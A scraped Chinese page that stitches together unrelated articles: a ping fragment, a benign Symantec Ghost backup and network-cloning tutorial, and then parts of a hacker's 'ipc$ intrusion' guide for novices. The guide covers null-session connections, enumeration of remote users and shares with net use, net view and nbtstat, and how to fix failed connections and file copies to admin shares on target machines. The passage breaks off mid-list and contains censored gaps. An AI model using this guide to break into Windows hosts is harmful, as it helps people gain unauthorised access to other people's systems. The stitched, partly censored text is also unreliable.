　　·ping IP Cn
　　执行特定次数的Ping命令。

GHOST详细解说（1）

一、分区备份

　　使用ghost进行系统备份，有整个硬盘（Disk）和分区硬盘（Partition）两种方式。在菜单中点击 Local（本地）项，在右面弹出的菜单中有3个子项，其中 Disk表示备份整个硬盘（即克隆）、Partition 表示备份硬盘的单个分区、Check 表示检查硬盘或备份的文件，查看是否可能因分区、硬盘被破坏等造成备份或还原失败。分区备份作为个人用户来保存系统数据，特别是在恢复和复制系统分区时具有实用价值。
　　选 Local→Partition→To Image 菜单，弹出硬盘选择窗口，开始分区备份操作。点击该窗口中白色的硬盘信息条，选择硬盘，进入窗口，选择要操作的分区（若没有鼠标，可用键盘进行操作：TAB键进行切换，回车键进行确认，方向键进行选择）。 在弹出的窗口中选择备份储存的目录路径并输入备份文件名称，注意备份文件的名称带有 GHO 的后缀名。 接下来，程序会询问是否压缩备份数据，并给出3个选择：No 表示不压缩，Fast表示压缩比例小而执行备份速度较快，High 就是压缩比例高但执行备份速度相当慢。最后选择 Yes 按钮即开始进行分区硬盘的备份。ghost 备份的速度相当快，不用久等就可以完成，备份的文件以 GHO 后缀名储存在设定的目录中。


二、硬盘克隆与备份

　　硬盘的克隆就是对整个硬盘的备份和还原。选择菜单Local→Disk→To Disk，在弹出的窗口中选择源硬盘（第一个硬盘），然后选择要复制到的目标硬盘（第二个硬盘）。注意，可以设置目标硬盘各个分区的大小，ghost 可以自动对目标硬盘按设定的分区数值进行分区和格式化。选择 Yes 开始执行。
　　ghost 能将目标硬盘复制得与源硬盘几乎完全一样，并实现分区、格式化、复制系统和文件一步完成。只是要注意目标硬盘不能太小，必须能将源硬盘的数据内容装下。
　　ghost 还提供了一项硬盘备份功能，就是将整个硬盘的数据备份成一个文件保存在硬盘上（菜单 Local→Disk→To Image），然后就可以随时还原到其他硬盘或源硬盘上，这对安装多个系统很方便。使用方法与分区备份相似。


三、备份还原

　　如果硬盘中备份的分区数据受到损坏，用一般数据修复方法不能修复，以及系统被破坏后不能启动，都可以用备份的数据进行完全的复原而无须重新安装程序或系统。当然，也可以将备份还原到另一个硬盘上。
　　要恢复备份的分区，就在界面中选择菜单Local→Partition→From Image，在弹出窗口中选择还原的备份文件，再选择还原的硬盘和分区，点击 Yes 按钮即可。


四、局域网操作

LPT 是通过并口传送备份文件,下面有两个选项：slave 和 master, 分别用以连接主机和客户机。 网络基本输入输出系统 NetBios 和 LPT 相似, 也有 slave 和 master 两个选项, 作用与 LPT 相同。
先和平时一样将要 ghost 的分区做成一个 *.gho 文件，再在一台 win98 上安装Symantec ghost 企业版，重启。
1. 首先制作一张 ghost 带网卡驱动的启动盘。Start > Programs > Symantec ghost > ghost Boot Wizard－>Network Boot Disk 如果你的网卡在列表内直接选择它就可以生成一张带 PC-DOS 的启动盘。（但 6.5版的生成的软盘经常有问题，不能成功启动）如果你的网卡不在列表内，你要建立专用的 Packet Driver。ADD->Packet Driver (网卡的驱动程序中有)往下根据提示一步一步走，填入工作站的 ip（ghost 一定要 tcp/ip 协议）。最后生成一张软盘，但此软盘仍不能使用，要改 autoexec.bat 文件在 net xxxx.dos 后面加一个16进制的地址，如 0X75 等。多台计算机只需改 wattcp.cfg 文件中的 ip 即可:
IP = 192.168.100.44
NETMASK = 255.255.255.0
GATEWAY = 192.168.100.1
2. 在 server 端运行 multicast server 出来的画面。先给 server一个Session Name（别名）如：bb，再选择 image file 就是你的 gho 文件。然后 －>Dump From Client->rtitions->More Options-> 在 auto start 的 client 中填入 50（如果你要同时复制50台）->accept client 就算完成了，当你的工作站数达到50台时，server就自动传送*.gho 文件。

3.详述：
目前，相当多的电子教室都采用了没有软驱、光驱的工作站。在没有软驱、光驱的情况下，当硬盘的软件系统出现问题时，能否实现网络硬盘克隆呢？PXE（Preboot Execution Environment，它是基于 TCP/IP、DHCP、TFTP 等 Internet 协议之上的扩展网络协议）技术提供的从网络启动的功能，让我们找到了解决之道。下面，我们就来讲解怎样采用ghost 7.0来实现基于 PXE 的网络硬盘克隆。

　　网络硬盘克隆过程简述

　　网络硬盘克隆过程为：在装有软驱的工作站上，用一张引导盘来启动机器，连接到服务器，使用 ghost 多播服务（Multicast Server）将硬盘或分区的映像克隆到工作站，这样就实现了不拆机、安全、快速的网络硬盘克隆。

　　实现 PXE 网络启动方式

　　对于没有软驱、光驱的工作站，要实现PXE网络启动方式，需要完成三个步骤：

　　1、工作站的PXE启动设置

　　PXE网络启动一般要求在网卡上加装 PXE 启动芯片（PXE Boot ROM）；对于某些型号的网卡，也可以将 PXE 启动代码（Boot Code）写入主板的 Flash ROM；而一些主板上集成了网卡的品牌机（例如清华同方的商用机），可直接支持PXE启动。

　　常用的 RTL8139 芯片的网卡，其 PXE 启动设置方式是：机器启动时根据屏幕提示按下Shift+F10，在启动类型中选择PXE，开启网络启动选项即可。

GHOST详细解说（2）


2、制作 PXE 启动文件

　　制作 PXE 的启动文件，推荐使用 3Com 的 DABS（Dynamic Access Boot Services）。DABS 提供了功能强大的 PXE 启动服务、管理功能，但是，网上可供下载的是一个30天的试用版。所以，我们只用它的启动映像文件制作功能，而由 Windows 2000 Server 的 DHCP 服务器来提供 PXE 启动服务。

　　DABS 可以安装在任何一台运行 Windows 的机器上。安装后，运行 3Com Boot Image Editor，出现主界面图。选择“创建TCP/IP或PXE映像文件（Create a TCP/IP or PXE image file）”，出现对话窗口。为即将建立的映像文件命名，例如：pxeghost.img，其他采用默认选项，将经测试正常的网络启动盘放入软驱，选择[OK]，创建PXE启动映像 Pxeghost.img文件。

　　在 3Com Boot Image Editor 的主菜单中，选择“创建PXE菜单启动文件（Creat a PXE menu boot file）”，在出现的窗口中选择[添加（Add）]，加入我们刚刚创建的启动映像文件Pxeghost.img，在“选项（Options）”标签中可以设置菜单标题和等待时间。

　　选择[保存（Save）]，给保存的PXE菜单启动文件命名为 Pxemenu.pxe。

　　3、服务器的PXE启动服务设置

　　Windows 2000 Server 的 DHCP 服务支持两种启动协议：DHCP 和 BOOTP。我们可以设定以下三种选择：仅 DHCP、仅 BOOTP、两者。如果我们的局域网中由其他的 DHCP 服务器提供动态 IP 地址分配，那么这里选“仅BOOTP”即可；如果需要这台服务器提供动态 IP 地址分配，则需要选“两者”。

　　接下来，设置启动文件名。在DHCP服务器的作用域选项中配置选项“067:启动文件名”，字串值为我们创建的 PXE 菜单启动文件名 Pxemenu.pxe。注意：文件名不包含路径。

　　DHCP 服务器只是将启动文件名通知给 BOOTP 客户机，客户机通过什么方式下载启动文件呢？答案是，需要 TFTP 服务。3Com 的 DABS 包含了一个 TFTP 服务组件，当然，也可以下载一个免费的 TFTP 服务器软件长期使用。

　　在 TFTP 服务器的设置中，规定一个服务目录。将制作的 PXE 启动文件 Pxeghost.img、Pxemenu.pxe 放到 TFTP 的服务目录中。TFTP 服务器设置为自动运行。

　　用 ghost 多播克隆硬盘

　　现在运行 ghost 多播服务器，任务名称为 Restore。设置完毕，按下[接受客户（Accept Clients）]按钮。启动要接受硬盘克隆的无软驱工作站，如果以上步骤操作无误，应该能够实现 PXE 启动，加入到多播克隆的任务当中。所有的目标工作站连接到本次任务之后，按下[发送（Send）]按钮，开始克隆任务。
五、参数设置
在 Options 中可以设置参数。下面简单介绍一下:
1．image write buffering：在建立备份文件时, 打开写缓冲；
2．sure：选择此项后, 不再会出现最终确认询问 (建议不要选择此项)；
3．no int 13：选择此项后, 不支持中断 13 (缺省时不选择)；
4．reboot：在对硬盘或者分区操作完成之后, 自动重启计算机；
5．spanning：通过多个卷架构备份文件 (选择此项时, 关闭 write buffering)；
6．autoname：自动为 spanning 文件命名；
7．allow 64k fat clusters：允许使用 64K FAT 簇 (仅在 Windows NT 中支持)；
8．ignore CRC errors：忽略 CRC 错误；
9．override size limit：如果出现分区大小不相配, 可忽略执行；
10．image read buffering：打开生成备份文件时的读缓存 (缺省时选中此项)。


六、软件特性

1.存贮介质
　　ghost 支持的存储介质超出了我们的想象，它支持对等 LPT 接口、对等 USB 接口、对等 TCP/IP 接口、SCSI磁带机、便携式设备（JAZ、ZIP、MO等）、光盘刻录机（CDR、CDRW）等。而这些特性不需要任何外带的驱动程序和软件，只需一张软盘就可以做到！特别是对光盘刻录机的支持，如今的刻录机和空白光盘都十分便宜，非常适合作备份的用途。

GHOST详细解说（3）


2.兼容性
　　ghost 对现有的操作系统都有良好的支持，包括 FAT16、FAT32、NTFS、HPFS、UNIX、NOVELL 等文件存储格式。同以前版本不同的是，ghost 2001 加入了对 Linux EX2的支持（FIFO 文件存储格式），这也就意味着 Linux 的用户也可以用 ghost 来备份系统了。

3.配套软件

　　A.ghost 浏览器
在以前的 ghost版本中，我们只能对整个系统进行简单的备份、复制、还原，要恢复单个的文件和文件夹还要使用外带的 GhostEXP 软件。现在，Symantec 公司已经将 ghost 浏览器整合在软件中。ghost 浏览器采用类似于资源管理器的界面，通过它，我们可以方便迅速地在备份包中找出我们想要的文件和文件夹并还原。
使用Explorer可以备份整个硬盘或单个硬盘分区，点击工具栏上的圆柱形图标，弹出硬盘或分区选择对话窗口，然后再选择备份文件的储存目录并输入名称即可完成。要注意的是，非注册用户不能使用备份这项功能。
在 ghost Explorer 中管理硬盘备份文件就非常方便了。首先选择打开一个备份文件(File/Open)，这时备份中的文件就像资源管理器一样在程序界面窗口中列出，可以在其中非常方便地查看、打开文件，也可以查找文件，或者将某个文件删除(但不能删除目录)。
在 ghost Explorer 中提供了多种还原硬盘备份文件的方法，最方便的方法是使用鼠标右键点击某个文件，在弹出菜单中选择 Restore，然后输入要还原到的目录，这样，单个文件就从整个磁盘备份中还原出来了。当然，如果要还原整个磁盘备份，只需选择左面目录列表栏中最上面的带磁盘图标的目录项，然后点击工具栏中的还原图标 (第二个) 就可以了。

B.GDisk
GDisk 是一个新加入的实用工具，它彻底取代了 FDisk 和 format，功能有：
* 快速格式化。
* ######和显示分区。此功能允许一个以上的主 DOS分区，并且每个分区上的操作系统有不同的版本。######分区的能力使计算机习惯于引导到选定的可引导分区，忽略其他######分区中相同操作系统的安装。
* 全面的分区报告。
* 高度安全的磁盘擦除。提供符合美国国防部标准和更高安全标准的磁盘擦除选项。
与使用交互式菜单的 FDisk 不同，GDisk是由命令行驱动的。这提供了更快的配置磁盘分区和在批处理文件中定义 GDisk操作的能力。但与此同时，几十个参数会令普通用户头疼，因此笔者不推荐一般用户使用，Symantec 公司也应该推出相应的GUI（图形用户界面）控制台以方便用户使用。具体的参数说明可以用命令行 gdisk* 了解。

C.Live Update
Live Update 是 Symantec公司软件的一个通用升级程序，它能够检查当前系统中已安装的 Symantec 软件，并且通过英特网对软件进行在线升级。
在安装 ghost 2001 时，安装程序自动升级了 Live Update 程序的版本。


七、命令行参数：（ghost 的无人 备份/恢复/复制 操作）

　　其实 ghost 2001 的功能远远不止它主程序中显示的那些，ghost 可以在其启动的命令行中添加众多参数以实现更多的功能。命令行参数在使用时颇为复杂，不过我们可以制作批处理文件，从而“一劳永逸”（类似于无人安装 Windows 98 和Windows 2000）。现在让我们来了解一些常用的参数（了解更加详细的参数介绍可查看 ghost 的帮助文件）。
1.-rb
本次 ghost 操作结束退出时自动重启。这样，在复制系统时就可以放心离开了。
2.-fx
本次 ghost 操作结束退出时自动回到DOS提示符。
3.-sure
对所有要求确认的提示或警告一律回答“Yes”。此参数有一定危险性，只建议高级用户使用。
4.-fro
如果源分区发现坏簇，则略过提示而强制拷贝。此参数可用于试着挽救硬盘坏道中的数据。
5.@filename
在 filename 中指定 txt 文件。txt文件中为 ghost 的附加参数，这样做可以不受DOS命令行 150 个字符的限制。
6.-f32
将源 FAT16 分区拷贝后转换成 FAT32（前提是目标分区不小于 2G）。WinNT 4 和Windows95、97用户慎用。
7.-bootcd
当直接向光盘中备份文件时，此选项可以使光盘变成可引导。此过程需要放入启动盘。
8.-fatlimit
将 NT 的 FAT16 分区限制在 2G。此参数在复制 Windows NT 分区，且不想使用64k/簇的 FAT16 时非常有用。
9.-span
分卷参数。当空间不足时提示复制到另一个分区的另一个备份包。
10.-auto
分卷拷贝时不提示就自动赋予一个文件名继续执行。
11.-crcignore
忽略备份包中的 CRC ERROR。除非需要抢救备份包中的数据，否则不要使用此参数，以防数据错误。
12.-ia
全部映像。ghost 会对硬盘上所有的分区逐个进行备份。
13.-ial
全部映像，类似于 -ia 参数，对 Linux 分区逐个进行备份。
14.-id
全部映像。类似于 -ia 参数，但包含分区的引导信息。
15.-quiet
操作过程中禁止状态更新和用户干预。
16.-script
可以执行多个 ghost 命令行。命令行存放在指定的文件中。
17.-split=x
　　将备份包划分成多个分卷，每个分卷的大小为 x兆。这个功能非常实用，用于大型备份包复制到移动式存储设备上，例如将一个 1.9G 的备份包复制到 3 张刻录盘上。
18.-z
　　将磁盘或分区上的内容保存到映像文件时进行压缩。-z 或 -z1 为低压缩率（快速）；-z2 为高压缩率（中速）；-z3 至 -z9 压缩率依次增大（速度依次减慢）。
19.-clone
　　这是实现 ghost 无人备份/恢复的核心参数。使用语法为：
-clone,MODE=(operation),SRC=(source),DST=(destination),[SZE(size),SZE(size)...]
此参数行较为复杂，且各参数之间不能含有空格。其中 operation意为操作类型，值可取：copy：磁盘到磁盘；load：文件到磁盘；dump：磁盘到文件；pcopy：分区到分区；pload：文件到分区；pdump：分区到文件。
　　Source 意为操作源，值可取：驱动器号，从1开始；或者为文件名，需要写绝对路径。
Destination 意为目标位置，值可取：驱动器号，从 1开始；或者为文件名，需要写绝对路径；@CDx，刻录机，x 表示刻录机的驱动器号，从1开始。

下面举例说明：

1.命令行参数：ghostpe.exe -clone,mode=copy,src=1,dst=2
完成操作：将本地磁盘1复制到本地磁盘2。

2.命令行参数：ghostpe.exe -clone,mode=pcopy,src=1:2,dst=2:1
完成操作：将本地磁盘1上的第二分区复制到本地磁盘2的第一分区。

3.命令行参数：ghostpe.exe-clone,mode=load,src=g:3prtdisk.gho,dst=1,sze1=450M,sze2=1599M,sze3=2047M
完成操作：从映像文件装载磁盘1，并将第一个分区的大小调整为450MB，第二个调整为1599MB，第三个调整为2047MB。

4.命令行参数：ghostpe.exe -clone,mode=pdump,src2:1:4:6,dst=d:prt246.gho
完成操作：创建仅含有选定分区的映像文件。从磁盘2上选择分区1、4、6。

八、一些示例
ghost.exe -clone,mode=copy,src=1,dst=2 -sure
硬盘对拷

ghost.exe -clone,mode=pcopy,src=1:2,dst=2:1 -sure
将一号硬盘的第二个分区复制到二号硬盘的第一个分区

ghost.exe -clone,mode=pdump,src=1:2,dst=g:bac.gho
将一号硬盘的第二个分区做成映像文件放到 g 分区中

ghost.exe -clone,mode=pload,src=g:bac.gho:2,dst=1:2
从内部存有两个分区的映像文件中，把第二个分区还原到硬盘的第二个分区

ghost.exe -clone,mode=pload,src=g:bac.gho,dst=1:1 -fx -sure -rb
用 g 盘的 bac.gho 文件还原 c 盘。完成后不显示任何信息，直接启动

ghost.exe -clone,mode=load,src=g:bac.gho,dst=2,SZE1=60P,SZE2=40P
将映像文件还原到第二个硬盘，并将分区大小比例修改成 60:40

自动还原磁盘：
首先做一个启动盘，包含 Config.sys, Autoexec.bat, Command.com, Io.sys, ghost.exe 文件(可以用 windows 做启动盘的程序完成)。Autoexec.bat 包含以下命令：
ghost.exe -clone,mode=pload,src=d:bac.gho,dst=1:1 -fx -sure -rb
利用在 D 盘的文件自动还原，结束以后自动退出 ghost 并且重新启动。

自动备份磁盘：
ghost.exe -clone,mode=pdump,src=1:1,dst=d:bac.gho -fx -sure -rb

自动还原光盘：
包含文件：Config.sys, Autoexec.bat, Mscdex.exe (CDROM 执行程序), Oakcdrom.sys (ATAPI CDROM 兼容驱动程序), ghost.exe。
Config.sys 内容为：
DEVICE=OAKCDROM.SYS /D:IDECD001
Autoexec.bat 内容为：
MSCDEX.EXE /D:IDECE001 /L:Z
ghost -clone,mode=load,src=z:bac.gho,dst=1:1 -sure -rb

可以根据下面的具体说明修改示例：

1.-clone

-clone 在使用时必须加入参数，它同时也是所有的 switch{batch switch} 里最实用的。下面是 clone 所定义的参数：

mode={copy|load|dump|pcopy|pload|pdump},
src={drive|file|driveartition},
dst={drive|file|driveartition}

mode 指定要使用哪种 clone 所提供的命令
copy 硬盘到硬盘的复制 (disk to disk copy)
load 文件还原到硬盘 (file to disk load)
dump 将硬盘做成映像文件 (disk to file dump)
pcopy 分区到分区的复制 (partition to partition copy)
pload 文件还原到分区 (file to partition load)
pdump 分区备份成映像文件（partition to file dump)

src 指定了 ghost 运行时使用的源分区的位置模式及其意义。对应 mode 命令 src 所使用参数例子:
COPY/DUMP 源硬盘号。以 1 代表第一号硬盘
LOAD 映像文件名。g:/back98/setup98.gho 或装置名称 (drive）
PCOPY/PDUMP 源分区号。1:2 代表的是硬盘１的第二个分区
PLOAD 分区映像文件名加上分区号或是驱动器名加上分区号。g:back98.gho:2 代表映像文件里的第二个分区

dst 指定运行 ghost 时使用的目标位置模式及其意义。对应 mode 命令 dst 所使用参数例子：
COPY/DUMP 目的硬盘号。2 代表第二号硬盘
LOAD 硬盘映像文件名。例 g:back98setup98.gho
PCOPY/PLOAD 目的分区号。2:2 代表硬盘 2 的第二个分区
PDUMP 分区映像文件名加分区号。g:back98setup98.gho:2
SZEn 指定所使用目的分区的大小：
n=xxxxM 指定第 n 目的分区的大小为 xxxxMB。如 SZE2=800M 表示分区 2 的大小为 800MB
n=mmP 指定第 n 目的分区的大小为整个硬盘的 mm 个百分比。

2.-fxo 当源物件出现坏块时，强迫复制继续进行

3.-fx 当ghost完成新系统的工作后不显示 press ctrl-alt-del to reboot 直接回到DOS下

4.-ia 完全执行扇区到扇区的复制。当由一个映像文件或由另一个硬盘为来源，复制一个分区时，ghost将首先检查来源分区，再决定是要复制文件和目录结构还是要做映像复制(扇区到扇区)。预设是这种形式。但是有的时候，硬盘里特定的位置可能会放一些######的与系统安全有关的文件。只有用扇区到扇区复制的方法才能正确复制

5.-pwd and -pwd=x 给映像文件加密

6.-rb 在还原或复制完成以后，让系统重新启动

7.-sure 可以和 clone 合用。ghost 不会显示 proceed with disk clone-destination drive will be overwritten? 提示信息

九、注意事项

1.在备份系统时，单个的备份文件最好不要超过 2GB。
2.在备份系统前，最好将一些无用的文件删除以减少ghost文件的体积。通常无用的文件有：Windows 的临时文件夹、IE 临时文件夹、Windows 的内存交换文件。这些文件通常要占去100 多兆硬盘空间。
3.在备份系统前，整理目标盘和源盘，以加快备份速度。
4.在备份系统前及恢复系统前，最好检查一下目标盘和源盘，纠正磁盘错误。
5.在恢复系统时，最好先检查一下要恢复的目标盘是否有重要的文件还未转移，千万不要等硬盘信息被覆盖后才后悔莫及啊。
6.在选择压缩率时，建议不要选择最高压缩率，因为最高压缩率非常耗时，而压缩率又没有明显的提高。
7.在新安装了软件和硬件后，最好重新制作映像文件，否则很可能在恢复后出现一些莫名其妙的错误。

ipc$详细解说大全（1）

一 前言
二 什么是ipc$
三 什么是空会话
四 空会话可以做什么
五 ipc$连接所使用的端口
六 ipc$连接在hack攻击中的意义
七 ipc$连接失败的常见原因
八 复制文件失败的原因
九 如何打开目标的IPC$共享以及其他共享
十 一些需要shell才能完成的命令
十一 入侵中可能会用到的相关命令
十二 ipc$完整入侵步骤祥解
十三 如何防范ipc$入侵
十四 ipc$入侵问答精选
十五 结束的话






一 前言

网上关于ipc$入侵的文章可谓多如牛毛，而且也不乏优秀之作，攻击步骤甚至可以说已经成为经典的模式，因此也没人愿意再把这已经成为定式的东西拿出来摆弄。
不过话虽这样说，但我个人认为这些文章讲解的并不详细，对于第一次接触ipc$的菜鸟来说，简单的罗列步骤并不能解答他们的种种迷惑（你随便找一个hack论坛搜一下ipc$，看看存在的疑惑有多少）。因此我参考了网上的一些资料，教程以及论坛帖子，写了这篇总结性质的文章，想把一些容易混淆，容易迷惑人的问题说清楚，让大家不要总徘徊在原地!
注意：本文所讨论的各种情况均默认发生在win NT/2000环境下，win98将不在此次讨论之列，而鉴于win Xp在安全设置上有所提高，个别操作并不适用，有机会将单独讨论。


二 什么是ipc$


IPC$(Internet Process Connection)是共享"命名管道"的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能，它有一个特点，即在同一时间内，两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑共享(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。所有的这些，微软的初衷都是为了方便管理员的管理，但在有意无意中，导致了系统安全性的降低。
平时我们总能听到有人在说ipc$漏洞，ipc$漏洞，其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说，一定是指微软自己安置的那个‘后门’：空会话（Null session）。那么什么是空会话呢？




三 什么是空会话


在介绍空会话之前，我们有必要了解一下一个安全会话是如何建立的。
在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的，建立成功的会话将成为一个安全隧道，建立双方通过它互通信息，这个过程的大致顺序如下：
1）会话请求者（客户）向会话接收者（服务器）传送一个数据包，请求安全隧道的建
立；
2）服务器产生一个随机的64位数（实现挑战）传送回客户；
3）客户取得这个由服务器产生的64位数，用试图建立会话的帐号的口令打乱它，将结
果返回到服务器（实现响应）；
4）服务器接受响应后发送给本地安全验证（LSA），LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号，核实本地发生；如果请求的帐号是一个域的帐号，响应传送到域控制器去核实。当对挑战的响应核实为正确后，一个访问令牌产生，然后传送给客户。客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。
以上是一个安全会话建立的大致过程，那么空会话又如何呢？

空会话是在没有信任的情况下与服务器建立的会话（即未提供用户名与密码），但根据WIN2000的访问控制模型，空会话的建立同样需要提供一个令牌，可是空会话在建立过程中并没有经过用户信息的认证，所以这个令牌中不包含用户信息，因此，这个会话不能让系统间发送加密信息，但这并不表示空会话的令牌中不包含安全标识符SID（它标识了用户和所属组），对于一个空会话，LSA提供的令牌的SID是S-1-5-7，这就是空会话的SID，用户名是：ANONYMOUS LOGON（这个用户名是可以在用户列表中看到的，但是是不能在SAM数据库中找到，属于系统内置的帐号），这个访问令牌包含下面伪装的组：
Everyone
Network
在安全策略的限制下，这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢？


四 空会话可以做什么


对于NT，在默认安全设置下，借助空连接可以列举目标主机上的用户和共享，访问everyone权限的共享，访问小部分注册表等，并没有什么太大的利用价值；对2000作用更小，因为在Windows 2000 和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表，而且实现起来也不方便，需借助工具。从这些我们可以看到，这种非信任会话并没有多大的用处，但从一次完整的ipc$入侵来看，空会话是一个不可缺少的跳板，因为我们从它那里可以得到户列表，这对于一个老练的黑客已经足够了。以下是空会话中能够使用的具体命令：


1 首先，我们先建立一个空会话（需要目标开放ipc$）
命令：net use \ipipc$ "" /user:""
注意：上面的命令包括四个空格，net与use中间有一个空格，use后面一个，密码左右各一个空格。


2 查看远程主机的共享资源
命令：net view \IP
解释：建立了空连接后，用此命令可以查看远程主机的共享资源，如果它开了共享，可以得到如下类似类似结果：
在 \*.*.*.*的共享资源
资源共享名 类型 用途 注释
pc$详细解说大全（2）

NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。


3 查看远程主机的当前时间
命令：net time \IP
解释：用此命令可以得到一个远程主机的当前时间。


4 得到远程主机的NetBIOS用户名列表（需要打开自己的NBT）
nbtstat -A IP
用此命令可以得到一个远程主机的NetBIOS用户名列表（需要你的netbios支持），返回如下结果：

Node IpAddress: [*.*.*.*] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H <1C> GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services <1C> GROUP Registered
IS~SERVER......<00> UNIQUE Registered

MAC Address = 00-50-8B-9A-2D-37

以上就是我们经常使用空会话做的事情，好像也能获得不少东西哟，不过要注意一点：建立IPC$连接的操作会在EventLog中留下记录，不管你是否登录成功。 好了，那么下面我们就来看看ipc$所使用的端口是什么？







五 ipc$所使用的端口


首先我们来了解一些基础知识：
1 SMB:(Server Message Block) Windows协议族，用于文件打印共享的服务；
2 NBT:(NETBios Over TCP/IP)使用137（UDP）138（UDP）139（TCP）端口实现基于TCP/IP协议的NETBIOS网络互联。
3 在WindowsNT中SMB基于NBT实现，而在Windows2000中，SMB除了基于NBT实现，还可以直接通过445端口实现。

有了这些基础知识，我们就可以进一步来讨论访问网络共享对端口的选择了：

对于win2000客户端来说：
1 如果在允许NBT的情况下连接服务器时，客户端会同时尝试访问139和445端口，如果445端口有响应，那么就发送RST包给139端口断开连接，用455端口进行会话，当445端口无响应时，才使用139端口，如果两个端口都没有响应，则会话失败；
2 如果在禁止NBT的情况下连接服务器时，那么客户端只会尝试访问445端口，如果445端口无响应，那么会话失败。由此可见，禁止了NBT后的win 2000对win NT的共享访问将会失败。


对于win2000服务器端来说：
1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放；
2 如果禁止NBT，那么只有445端口开放。


我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见，如果远程服务器没有监听139或445端口，ipc$会话是无法建立的。


六 ipc$连接在hack攻击中的意义


就像上面所说的，即使你建立了一个空的连接，你也可以获得不少的信息（而这些信息往往是入侵中必不可少的），如果你能够以某一个具有一定权限的用户身份登陆的话，那么你就会得到相应的权限，显然，如果你以管理员身份登陆,嘿嘿,那你可就了不得了，基本上可以为所欲为了。不过你也不要高兴的太早，因为管理员的密码不是那么好搞到的，虽然会有一些粗心的管理员存在弱口令，但这毕竟是少数，而且现在不比从前了，随着人们安全意识的提高，管理员们也愈加小心了，得到管理员密码将会越来越难的，因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接，甚至在主机不开启ipc$共享时，你根本就无法连接，你会慢慢的发现ipc$连接并不是万能的，所以不要奢望每次连接都能成功，那是不现实的。
是不是有些灰心？倒也不用,关键是我们要摆正心态，不要把ipc$入侵当作终极武器，不要认为它战无不胜,它只是很多入侵方法中的一种，你有可能利用它一击必杀，也有可能一无所获，这些都是正常的，在黑客的世界里，不是每条大路都能通往罗马，但总有一条路会通往罗马，耐心的寻找吧！

说明：ipc$详细解说大全（2）和ipc$详细解说大全（1）连在一起，要找ipc$详细解说大全（2）去上面的连接找去吧！（细细的找）

ipc$详细解说大全（3）

七 ipc$连接失败的常见原因

以下是一些常见的导致ipc$连接失败的原因：


1 IPC连接是Windows NT及以上系统中特有的功能，由于其需要用到Windows NT中很多DLL函数，所以不能在Windows 9.x/Me系统中运行，也就是说只有nt/2000/xp才可以相互建立ipc$连接，98/me是不能建立ipc$连接的；


2 如果想成功的建立一个ipc$连接，就需要对方开启ipc$共享，即使是空连接也是这样，如果对方关闭了ipc$共享，你将会建立失败；


3 你未启动Lanmanworkstation服务，它提供网络链结和通讯，没有它你无法发起连接请求（显示名为：Workstation）；


4 对方未启动Lanmanserver服务，它提供了 RPC 支持、文件、打印以及命名管道共享，ipc$依赖于此服务，没有它远程主机将无法响应你的连接请求（显示名为：Server）；


5 对方未启动NetLogon，它支持网络上计算机 pass-through 帐户登录身份；


6 对方禁止了NBT（即未打开139端口）；


7 对方防火墙屏蔽了139和445端口；


8 你的用户名或者密码错误（显然空会话排除这种错误）；


9 命令输入错误：可能多了或少了空格，当用户名和密码中不包含空格时两边的双引号可以省略，如果密码为空，可以直接输入两个引号""即可；


10 如果在已经建立好连接的情况下对方重启计算机，那么ipc$连接将会自动断开，需要重新建立连接。


另外,你也可以根据返回的错误号分析原因：
错误号5，拒绝访问：很可能你使用的用户不是管理员权限的，先提升权限；
错误号51，Windows无法找到网络路径：网络有问题；
错误号53，找不到网络路径：ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；
错误号67，找不到网络名：你的lanmanworkstation服务未启动或者目标删除了ipc$；
错误号1219，提供的凭据与已存在的凭据集冲突：你已经和对方建立了一个ipc$，请删除再连；
错误号1326，未知的用户名或错误密码：原因很明显了；
错误号1792，试图登录，但是网络登录服务没有启动：目标NetLogon服务未启动；
错误号2242，此用户的密码已经过期：目标有帐号策略，强制定期要求更改密码。







八 复制文件失败的原因


有些朋友虽然成功的建立了ipc$连接，但在copy时却遇到了这样那样的麻烦，无法复制成功，那么导致复制失败的常见原因又有哪些呢？


1 盲目复制
这类错误出现的最多，占到50%以上。许多朋友甚至都不知道对方是否有共享文件夹，就进行盲目复制，结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用net view \IP这个命令看一下对方的共享情况，不要认为ipc$连接建立成功了就一定有共享文件夹。


2 默认共享判断错误
这类错误也是大家经常犯的，主要有两个小方面：

1）错误的认为能建立ipc$连接的主机就一定开启了默认共享，因而在建立完连接之后马上向admin$之类的默认共享复制文件，导致复制失败。ipc$连接成功只能说明对方打开了ipc$共享，ipc$共享与默认共享是两码事，ipc$共享是一个命名管道，并不是哪个实际的文件夹，而默认共享并不是ipc$共享的必要条件；

2）由于net view \IP 无法显示默认共享（因为默认共享带$），因此通过这个命令，我们并不能判断对方是否开启了默认共享，因此如果对方未开启默认共享，那么所有向默认共享进行的操作都不能成功；（不过大部分扫描软件在扫弱口令的同时，都能扫到默认共享目录，可以避免此类错误的发生）


3用户权限不够，包括四种情形：
1）空连接向所有共享（默认共享和普通共享）复制时，大多情况下权限是不够的；
2）向默认共享复制时，要具有管理员权限；
